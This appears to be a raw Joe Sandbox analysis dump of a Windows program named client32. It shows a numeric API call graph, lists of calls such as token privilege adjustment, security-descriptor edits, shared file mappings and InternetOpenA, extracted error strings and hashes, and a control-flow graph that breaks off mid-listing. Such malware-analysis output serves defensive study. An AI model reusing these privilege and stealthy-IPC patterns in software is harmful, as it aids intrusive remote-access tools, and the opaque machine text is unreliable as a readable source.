63881 11165956 _memset 63879->63881 63880 11165962 63880->63792 63881->63880 63884 11165985 _strcspn 63881->63884 63924 111699f9 65 API calls __write 63881->63924 63884->63880 63925 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63884->63925 63926 111699f9 65 API calls __write 63884->63926 63887 1116c675 __getptd 65 API calls 63886->63887 63890 11174bd9 63887->63890 63888 11174be6 GetUserDefaultLCID 63900 11174c6d 63888->63900 63890->63888 63896 11174c10 63890->63896 63937 1117463f 84 API calls _LanguageEnumProc@4 63890->63937 63891 11174c78 63891->63888 63894 11174c83 _strlen EnumSystemLocalesA 63891->63894 63893 11174c22 63898 11174c36 63893->63898 63899 11174c2d 63893->63899 63894->63900 63896->63891 63896->63893 63897 11174dae 63897->63792 63942 11174b90 _strlen EnumSystemLocalesA _GetPrimaryLen 63898->63942 63938 11174b29 _strlen _strlen 63899->63938 63900->63897 63927 111746a1 63900->63927 63902 11174cde 63902->63897 63906 11174d03 IsValidCodePage 63902->63906 63904 11174c34 63904->63900 63943 1117463f 84 API calls _LanguageEnumProc@4 63904->63943 63906->63897 63908 11174d15 IsValidLocale 63906->63908 63907 11174c54 63907->63900 63909 11174c6f 63907->63909 63910 11174c66 63907->63910 63908->63897 63913 11174d28 63908->63913 63944 11174b90 _strlen EnumSystemLocalesA _GetPrimaryLen 63909->63944 63914 11174b29 _GetLcidFromLangCountry 3 API calls 63910->63914 63912 11174d79 GetLocaleInfoA 63912->63897 63916 11174d8a GetLocaleInfoA 63912->63916 63913->63897 63913->63912 63915 1116cd5f _strcpy_s 65 API calls 63913->63915 63914->63900 63916->63897 63921->63788 63922->63792 63923->63792 63924->63884 63925->63884 63926->63884 63928 111746fb GetLocaleInfoW 63927->63928 63931 111746ab __setlocale_nolock 63927->63931 63929 11174717 63928->63929 63936 111746ea 63928->63936 63930 1117471d GetACP 63929->63930 63929->63936 63930->63902 63931->63928 63932 111746c1 __setlocale_nolock 63931->63932 63933 111746d2 GetLocaleInfoW 63932->63933 63934 111746ef 
63932->63934 63933->63936 63947 11163c91 77 API calls __wcstoi64 63934->63947 63936->63902 63937->63896 63939 11174b5a _GetPrimaryLen 63938->63939 63940 11174b66 EnumSystemLocalesA 63939->63940 63941 11174b80 63940->63941 63941->63904 63942->63904 63943->63907 63944->63900 63947->63936 63951->63856 63952->63856 63953->63856 63954->63855 63956 111436a6 63955->63956 63958 11143763 63956->63958 63964 11081d30 63956->63964 63958->63649 63959 111436cb 63960 11081d30 IsDBCSLeadByte 63959->63960 63962 111436fb 63960->63962 63961 1114374d 63961->63649 63962->63961 63963 11143738 _memmove 63962->63963 63963->63961 63965 11081d3c 63964->63965 63967 11081d41 __mbschr_l std::locale::_Init 63964->63967 63968 11081c50 IsDBCSLeadByte 63965->63968 63967->63959 63968->63967 63972 11061970 63969->63972 63983 11061290 63972->63983 63974 110619ba 63991 11061320 63974->63991 63976 11061a08 64022 11061170 63976->64022 63980 110619cc 63980->63976 63982 11061320 286 API calls 63980->63982 63982->63980 63984 111101b0 std::locale::_Init 274 API calls 63983->63984 63985 110612ac 63984->63985 63986 110612b3 63985->63986 64026 1116305a std::exception::_Copy_str 63985->64026 63986->63974 63988 11061304 64027 111634b1 RaiseException 63988->64027 63990 11061319 63992 11061355 63991->63992 64020 11061624 std::ios_base::_Ios_base_dtor 63991->64020 63993 110614b4 63992->63993 63994 11061401 RegEnumValueA 63992->63994 63995 11061389 RegQueryInfoKeyA 63992->63995 64019 11061542 std::ios_base::_Ios_base_dtor 63993->64019 63993->64020 64028 110611e0 63993->64028 63999 1106149c 63994->63999 64008 11061435 63994->64008 63997 110613c2 63995->63997 63998 110613ae 63995->63998 64001 110613e2 63997->64001 64038 11029a70 274 API calls 2 library calls 63997->64038 64037 11029a70 274 API calls 2 library calls 63998->64037 64002 11163aa5 _free 65 API calls 63999->64002 64006 11163a11 _malloc 65 API calls 64001->64006 64005 110614a9 64002->64005 64003 11081d30 IsDBCSLeadByte 64003->64008 64005->63993 64011 
110613f0 64006->64011 64007 1106146e RegEnumValueA 64007->63999 64007->64008 64008->64003 64008->64007 64008->64020 64039 11081e70 64008->64039 64010 110615a0 64010->64019 64050 11029a70 274 API calls 2 library calls 64010->64050 64011->63994 64013 11146a90 278 API calls 64013->64019 64017 11081d30 IsDBCSLeadByte 64017->64019 64019->64010 64019->64013 64019->64017 64019->64020 64021 11081e70 86 API calls 64019->64021 64020->63980 64021->64019 64023 110611a3 64022->64023 64024 110608e0 68 API calls 64023->64024 64026->63988 64027->63990 64029 110611ee 64028->64029 64030 11061208 64028->64030 64051 110608e0 64029->64051 64030->64019 64034 11145bc0 64030->64034 64095 111434c0 64034->64095 64040 11081e7d 64039->64040 64041 11081e82 64039->64041 64102 11081c50 IsDBCSLeadByte 64040->64102 64052 110608f4 64051->64052 64058 1106092c 64051->64058 64052->64058 64102->64041 64104->63674 64105->63675 64451->63715 64452->63720 64453 11116880 64471 11145ef0 64453->64471 64456 111168c5 64457 111168d4 CoInitialize CoCreateInstance 64456->64457 64458 111168a8 64456->64458 64460 11116904 LoadLibraryA 64457->64460 64461 111168f9 64457->64461 64462 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64458->64462 64459 11145c70 std::locale::_Init 91 API calls 64459->64456 64460->64461 64464 11116920 GetProcAddress 64460->64464 64465 111169e1 CoUninitialize 64461->64465 64466 111169e7 64461->64466 64463 111168b6 64462->64463 64467 11116930 SHGetSettings 64464->64467 64468 11116944 FreeLibrary 64464->64468 64465->64466 64469 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64466->64469 64467->64468 64468->64461 64470 111169f6 64469->64470 64472 11145c70 std::locale::_Init 91 API calls 64471->64472 64473 1111689e 64472->64473 64473->64456 64473->64458 64473->64459 64474 1102ebd0 64475 1102ec13 64474->64475 64476 111101b0 std::locale::_Init 274 API calls 64475->64476 64477 1102ec1a 64476->64477 64478 11143780 86 API calls 
64477->64478 64479 1102ec64 64478->64479 64480 1102ec91 64479->64480 64481 11081e70 86 API calls 64479->64481 64483 11143780 86 API calls 64480->64483 64482 1102ec76 64481->64482 64485 11081e70 86 API calls 64482->64485 64484 1102ecba 64483->64484 64486 11163ca7 std::locale::_Init 77 API calls 64484->64486 64490 1102ecc7 64484->64490 64485->64480 64486->64490 64487 1102ecf6 64488 1102ed68 64487->64488 64489 1102ed4f GetSystemMetrics 64487->64489 64493 1102ed82 CreateEventA 64488->64493 64489->64488 64491 1102ed5e 64489->64491 64490->64487 64494 11145c70 std::locale::_Init 91 API calls 64490->64494 64492 11147060 std::locale::_Init 21 API calls 64491->64492 64492->64488 64495 1102ed95 64493->64495 64496 1102eda9 64493->64496 64494->64487 65540 11029a70 274 API calls 2 library calls 64495->65540 64498 111101b0 std::locale::_Init 274 API calls 64496->64498 64499 1102edb0 64498->64499 64500 1102edd0 64499->64500 65541 11110de0 64499->65541 64502 111101b0 std::locale::_Init 274 API calls 64500->64502 64503 1102ede4 64502->64503 64504 11110de0 437 API calls 64503->64504 64505 1102ee04 64503->64505 64504->64505 64506 111101b0 std::locale::_Init 274 API calls 64505->64506 64507 1102ee83 64506->64507 64508 1102eeb3 64507->64508 64509 11061aa0 314 API calls 64507->64509 64510 111101b0 std::locale::_Init 274 API calls 64508->64510 64509->64508 64511 1102eecd 64510->64511 64512 1102eef2 FindWindowA 64511->64512 64513 11061710 304 API calls 64511->64513 64515 1102f032 64512->64515 64516 1102ef2b 64512->64516 64513->64512 64517 11061ef0 278 API calls 64515->64517 64516->64515 64520 1102ef43 GetWindowThreadProcessId 64516->64520 64518 1102f044 64517->64518 64519 11061ef0 278 API calls 64518->64519 64521 1102f050 64519->64521 64522 11147060 std::locale::_Init 21 API calls 64520->64522 64524 11061ef0 278 API calls 64521->64524 64523 1102ef60 OpenProcess 64522->64523 64523->64515 64525 1102ef7d 64523->64525 64526 1102f05c 64524->64526 64530 11147060 std::locale::_Init 21 API calls 
64525->64530 64527 1102f073 64526->64527 64528 1102f06a 64526->64528 64894 111464e0 64527->64894 65569 11028360 119 API calls 2 library calls 64528->65569 64533 1102efb0 64530->64533 64531 1102f06f 64531->64527 64535 1102efef CloseHandle FindWindowA 64533->64535 64538 11147060 std::locale::_Init 21 API calls 64533->64538 64534 1102f082 64536 1102f086 64534->64536 64909 1102a6d0 IsJPIK 64534->64909 64539 1102f022 64535->64539 64540 1102f014 GetWindowThreadProcessId 64535->64540 64925 11145990 ExpandEnvironmentStringsA 64536->64925 64542 1102efc2 SendMessageA WaitForSingleObject 64538->64542 64543 11147060 std::locale::_Init 21 API calls 64539->64543 64540->64539 64542->64535 64546 1102efe2 64542->64546 64544 1102f02f 64543->64544 64544->64515 64548 11147060 std::locale::_Init 21 API calls 64546->64548 64550 1102efec 64548->64550 64549 1102f0b5 64551 1102f177 64549->64551 64947 11063880 64549->64947 64550->64535 64962 11027b20 64551->64962 64558 1102f1bd 64559 1102f19c std::locale::_Init 64559->64558 64561 1102ad70 std::locale::_Init 144 API calls 64559->64561 64895 111457a0 std::locale::_Init 274 API calls 64894->64895 64896 111464fb wsprintfA 64895->64896 64897 111457a0 std::locale::_Init 274 API calls 64896->64897 64898 11146517 wsprintfA 64897->64898 64899 11143e00 std::locale::_Init 8 API calls 64898->64899 64900 11146534 64899->64900 64901 11146560 64900->64901 64902 11143e00 std::locale::_Init 8 API calls 64900->64902 64903 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64901->64903 64904 11146549 64902->64904 64905 1114656c 64903->64905 64904->64901 64906 11146550 64904->64906 64905->64534 64907 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64906->64907 64908 1114655c 64907->64908 64908->64534 64910 1102a705 64909->64910 64917 1102a7d3 64909->64917 64911 111101b0 std::locale::_Init 274 API calls 64910->64911 64912 1102a70c 64911->64912 64913 1102a73b 64912->64913 64914 11061aa0 314 API calls 
64912->64914 64915 11063880 348 API calls 64913->64915 64914->64913 64916 1102a759 64915->64916 64916->64917 64918 110d1930 278 API calls 64916->64918 64917->64536 64920 1102a765 64918->64920 64919 1102a7c7 64921 110d0a10 274 API calls 64919->64921 64920->64919 64922 1102a798 64920->64922 64921->64917 64923 110d0a10 274 API calls 64922->64923 64924 1102a7a4 64923->64924 64924->64536 64926 111459c7 64925->64926 64927 111459e4 std::locale::_Init 64926->64927 64928 111459fe 64926->64928 64935 111459d4 64926->64935 64930 111459f5 GetModuleFileNameA 64927->64930 64929 111457a0 std::locale::_Init 274 API calls 64928->64929 64931 11145a04 64929->64931 64930->64931 64933 11081e00 std::locale::_Init IsDBCSLeadByte 64931->64933 64932 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64934 1102f0a3 64932->64934 64933->64935 64936 11143e00 64934->64936 64935->64932 64937 11143e21 CreateFileA 64936->64937 64939 11143ebe CloseHandle 64937->64939 64940 11143e9e 64937->64940 64943 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64939->64943 64941 11143ea2 CreateFileA 64940->64941 64942 11143edb 64940->64942 64941->64939 64941->64942 64945 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64942->64945 64944 11143ed7 64943->64944 64944->64549 64946 11143eea 64945->64946 64946->64549 64948 1105e820 77 API calls 64947->64948 64949 110638a8 64948->64949 65630 110627b0 64949->65630 64963 11061a70 286 API calls 64962->64963 64964 11027b54 64963->64964 64965 1105e820 77 API calls 64964->64965 64967 11027b69 64965->64967 64966 11027bbf LoadIconA 64970 11027bd1 64966->64970 64971 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 64966->64971 64967->64966 64969 11145ef0 std::locale::_Init 91 API calls 64967->64969 64979 11027c38 64967->64979 64968 11027cec 64974 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64968->64974 64975 11027ba2 LoadLibraryExA 64969->64975 
64970->64971 64972 11027c13 64971->64972 64973 11027bff LoadIconA 64971->64973 64977 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 64972->64977 64972->64979 64973->64972 64978 11027cf9 64974->64978 64975->64966 64975->64973 64977->64979 64978->64559 64979->64968 64980 11081e70 86 API calls 64979->64980 64981 11145c70 std::locale::_Init 91 API calls 64979->64981 66257 11061e10 278 API calls 3 library calls 64979->66257 64980->64979 64981->64979 65542 111101b0 std::locale::_Init 274 API calls 65541->65542 65543 11110e11 65542->65543 65544 11110e33 GetCurrentThreadId InitializeCriticalSection 65543->65544 65546 111101b0 std::locale::_Init 274 API calls 65543->65546 65547 11110ea0 EnterCriticalSection 65544->65547 65548 11110e93 InitializeCriticalSection 65544->65548 65549 11110e2c 65546->65549 65550 11110f5a LeaveCriticalSection 65547->65550 65551 11110ece CreateEventA 65547->65551 65548->65547 65549->65544 67102 1116305a std::exception::_Copy_str 65549->67102 65550->64500 65552 11110ee1 65551->65552 65553 11110ef8 65551->65553 67104 11029a70 274 API calls 2 library calls 65552->67104 65556 111101b0 std::locale::_Init 274 API calls 65553->65556 65560 11110eff 65556->65560 65557 11110e4f 67103 111634b1 RaiseException 65557->67103 65561 11110f1c 65560->65561 65562 11110de0 431 API calls 65560->65562 65563 111101b0 std::locale::_Init 274 API calls 65561->65563 65562->65561 65564 11110f2c 65563->65564 65565 11110f3d 65564->65565 67105 11110280 InterlockedIncrement InterlockedIncrement CreateEventA 65564->67105 65567 11110040 431 API calls 65565->65567 65568 11110f55 65567->65568 65568->65550 65569->64531 65750 11145a70 65630->65750 65632 1106283c 65633 110d1930 278 API calls 65632->65633 65634 11062850 65633->65634 65635 11062864 std::ios_base::_Ios_base_dtor 65634->65635 65637 11062a37 65634->65637 65759 1116535d 65634->65759 65636 110637a8 65635->65636 65638 11164c77 std::locale::_Init 101 API calls 65635->65638 65639 1116535d _fgets 80 API calls 65637->65639 
65638->65636 65758 11145a83 std::ios_base::_Ios_base_dtor 65750->65758 65751 11145990 276 API calls 65751->65758 65752 11164ead std::locale::_Init 142 API calls 65752->65758 65753 11145aea std::ios_base::_Ios_base_dtor 65753->65632 65754 11145aa5 GetLastError 65755 11145ab0 Sleep 65754->65755 65754->65758 65756 11164ead std::locale::_Init 142 API calls 65755->65756 65757 11145ac2 65756->65757 65757->65753 65757->65758 65758->65751 65758->65752 65758->65753 65758->65754 65760 11165369 __write 65759->65760 66257->64979 67102->65557 67103->65544 67105->65565 67107 110262f0 67108 110262fe GetProcAddress 67107->67108 67109 1102630f 67107->67109 67108->67109 67110 11026328 67109->67110 67111 1102631c K32GetProcessImageFileNameA 67109->67111 67113 1102632e GetProcAddress 67110->67113 67114 1102633f 67110->67114 67111->67110 67112 11026361 67111->67112 67113->67114 67115 11026346 67114->67115 67116 11026357 SetLastError 67114->67116 67116->67112 67117 1113d980 67118 1113d989 67117->67118 67119 1113d98e 67117->67119 67121 11139ed0 67118->67121 67122 11139f12 67121->67122 67123 11139f07 GetCurrentThreadId 67121->67123 67124 11139f20 67122->67124 67253 11029950 67122->67253 67123->67122 67260 11134830 67124->67260 67130 1113a011 67135 1113a042 FindWindowA 67130->67135 67141 1113a0da 67130->67141 67131 1113a59a 67133 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67131->67133 67136 1113a5b2 67133->67136 67134 11139f5c IsWindow IsWindowVisible 67137 11147060 std::locale::_Init 21 API calls 67134->67137 67138 1113a057 IsWindowVisible 67135->67138 67135->67141 67136->67119 67139 11139f87 67137->67139 67140 1113a05e 67138->67140 67138->67141 67143 1105e820 77 API calls 67139->67143 67140->67141 67148 11139a70 375 API calls 67140->67148 67144 1105e820 77 API calls 67141->67144 67154 1113a0ff 67141->67154 67142 1113a2b0 67147 1113a2ca 67142->67147 67151 11139a70 375 API calls 67142->67151 67146 11139fa3 IsWindowVisible 67143->67146 67164 1113a127 
67144->67164 67145 1105e820 77 API calls 67149 1113a29f 67145->67149 67146->67130 67150 11139fb1 67146->67150 67153 1113a2e7 67147->67153 67496 1106c340 310 API calls 67147->67496 67152 1113a07f IsWindowVisible 67148->67152 67149->67142 67155 1113a2a4 67149->67155 67150->67130 67156 11139fb9 67150->67156 67151->67147 67152->67141 67157 1113a08e IsIconic 67152->67157 67497 1112ddd0 12 API calls 2 library calls 67153->67497 67154->67142 67154->67145 67495 1102d750 304 API calls std::locale::_Init 67155->67495 67162 11147060 std::locale::_Init 21 API calls 67156->67162 67157->67141 67163 1113a09f GetForegroundWindow 67157->67163 67160 1113a2ec 67165 1113a2f4 67160->67165 67166 1113a2fd 67160->67166 67168 11139fc3 GetForegroundWindow 67162->67168 67493 11132120 146 API calls 67163->67493 67164->67154 67170 11081d30 IsDBCSLeadByte 67164->67170 67179 1113a174 67164->67179 67498 11132a10 87 API calls 2 library calls 67165->67498 67173 1113a314 67166->67173 67174 1113a308 67166->67174 67167 1113a2ab 67167->67142 67175 11139fd2 EnableWindow 67168->67175 67176 11139ffe 67168->67176 67170->67179 67172 11143e00 std::locale::_Init 8 API calls 67181 1113a186 67172->67181 67500 111326b0 311 API calls std::locale::_Init 67173->67500 67182 1113a319 67174->67182 67499 11132780 311 API calls std::locale::_Init 67174->67499 67491 11132120 146 API calls 67175->67491 67176->67130 67185 1113a00a SetForegroundWindow 67176->67185 67177 1113a0ae 67494 11132120 146 API calls 67177->67494 67179->67172 67180 1113a2fa 67180->67166 67187 1113a193 GetLastError 67181->67187 67204 1113a1a1 67181->67204 67189 1113a312 67182->67189 67190 1113a429 67182->67190 67185->67130 67186 1113a0b5 67193 1113a0cb EnableWindow 67186->67193 67198 1113a0c4 SetForegroundWindow 67186->67198 67194 11147060 std::locale::_Init 21 API calls 67187->67194 67189->67182 67195 1113a331 67189->67195 67196 1113a3db 67189->67196 67192 11139600 320 API calls 67190->67192 67191 11139fe9 67492 11132120 146 API calls 67191->67492 
67212 1113a42e 67192->67212 67193->67141 67194->67204 67195->67190 67202 111101b0 std::locale::_Init 274 API calls 67195->67202 67196->67190 67507 1103f920 69 API calls 67196->67507 67198->67193 67199 11139ff0 EnableWindow 67199->67176 67200 1113a455 67214 1105e820 77 API calls 67200->67214 67252 1113a57a std::ios_base::_Ios_base_dtor 67200->67252 67206 1113a352 67202->67206 67203 1113a3ea 67508 1103f960 69 API calls 67203->67508 67204->67154 67205 1113a1f2 67204->67205 67209 11081d30 IsDBCSLeadByte 67204->67209 67207 11143e00 std::locale::_Init 8 API calls 67205->67207 67210 1113a373 67206->67210 67501 11057eb0 319 API calls 67206->67501 67211 1113a204 67207->67211 67209->67205 67502 1110fff0 InterlockedIncrement 67210->67502 67211->67154 67216 1113a20b GetLastError 67211->67216 67212->67200 67407 11142d90 67212->67407 67213 1113a3f5 67509 1103f980 69 API calls 67213->67509 67226 1113a485 67214->67226 67219 11147060 std::locale::_Init 21 API calls 67216->67219 67219->67154 67221 1113a400 67510 1103f940 69 API calls 67221->67510 67222 1113a398 67503 1104d790 379 API calls 67222->67503 67225 1113a40b 67511 11110000 InterlockedDecrement 67225->67511 67227 1113a4cd 67226->67227 67230 1113a4aa 67226->67230 67231 1113a4d9 GetTickCount 67226->67231 67226->67252 67227->67231 67227->67252 67228 1113a3a3 67504 1104ed40 379 API calls 67228->67504 67233 11147060 std::locale::_Init 21 API calls 67230->67233 67234 1113a4eb 67231->67234 67231->67252 67232 1113a3d9 67232->67190 67235 1113a4b5 GetTickCount 67233->67235 67236 11143a50 144 API calls 67234->67236 67235->67252 67238 1113a4f7 67236->67238 67240 11147af0 278 API calls 67238->67240 67239 1113a3b9 67505 1104d7d0 379 API calls 67239->67505 67243 1113a502 67240->67243 67242 1113a3c4 67242->67190 67506 110ec320 296 API calls 67242->67506 67244 11143a50 144 API calls 67243->67244 67246 1113a515 67244->67246 67512 110261a0 LoadLibraryA 67246->67512 67248 1113a522 67248->67248 67513 1112d6e0 GetProcAddress SetLastError 

Control-flow Graph (legend: Executed / Not Executed)
                                                                                APIs
                                                                                  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1B702977,00080000,00000000,?), ref: 1109D88D
                                                                                  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1B702977,00080000,00000000,?), ref: 1109E645
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                • GetLastError.KERNEL32 ref: 1109E75D
                                                                                • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                • _memset.LIBCMT ref: 1109E920
                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                • API String ID: 3291243470-2792520954
                                                                                • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

                                                                                Control-flow Graph

                                                                                control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 911 11029d4a-11029d4d 909->911 912 11029cab-11029cc3 call 11163a11 909->912 913 11029c73-11029c8a GetProcAddress 910->913 914 11029c8c-11029c8f 910->914 916 11029d68-11029d80 InternetOpenA 911->916 917 11029d4f-11029d66 GetProcAddress 911->917 923 11029ce4-11029cf0 912->923 924 11029cc5-11029cde GetProcAddress 912->924 913->914 918 11029c91-11029c93 SetLastError 913->918 914->909 921 11029da4-11029db0 call 11163aa5 916->921 917->916 920 11029d99-11029da1 SetLastError 917->920 918->909 920->921 930 11029db6-11029de7 call 11142e60 call 11165250 921->930 931 1102a02a-1102a034 921->931 929 11029cf2-11029cfb GetLastError 923->929 932 11029d11-11029d13 923->932 924->923 926 11029d82-11029d8a SetLastError 924->926 926->929 929->932 933 11029cfd-11029d0f call 11163aa5 call 11163a11 929->933 952 11029de9-11029dec 930->952 953 11029def-11029e04 call 11081d30 * 2 930->953 931->903 935 1102a03a 931->935 937 11029d30-11029d3c 932->937 938 11029d15-11029d2e GetProcAddress 932->938 933->932 940 1102a04c-1102a04f 935->940 937->911 956 11029d3e-11029d47 937->956 938->937 944 11029d8f-11029d97 SetLastError 938->944 941 1102a051-1102a056 940->941 942 1102a05b-1102a05e 940->942 948 1102a1bf-1102a1c7 941->948 949 1102a060-1102a065 942->949 950 1102a06a 942->950 944->911 954 1102a1d0-1102a1e3 948->954 955 1102a1c9-1102a1ca FreeLibrary 948->955 957 1102a18f-1102a194 949->957 958 1102a06d-1102a075 950->958 952->953 976 11029e06-11029e0a 953->976 977 11029e0d-11029e19 953->977 955->954 956->911 963 1102a196-1102a1ad GetProcAddress 957->963 964 1102a1af-1102a1b5 957->964 961 1102a077-1102a08e 
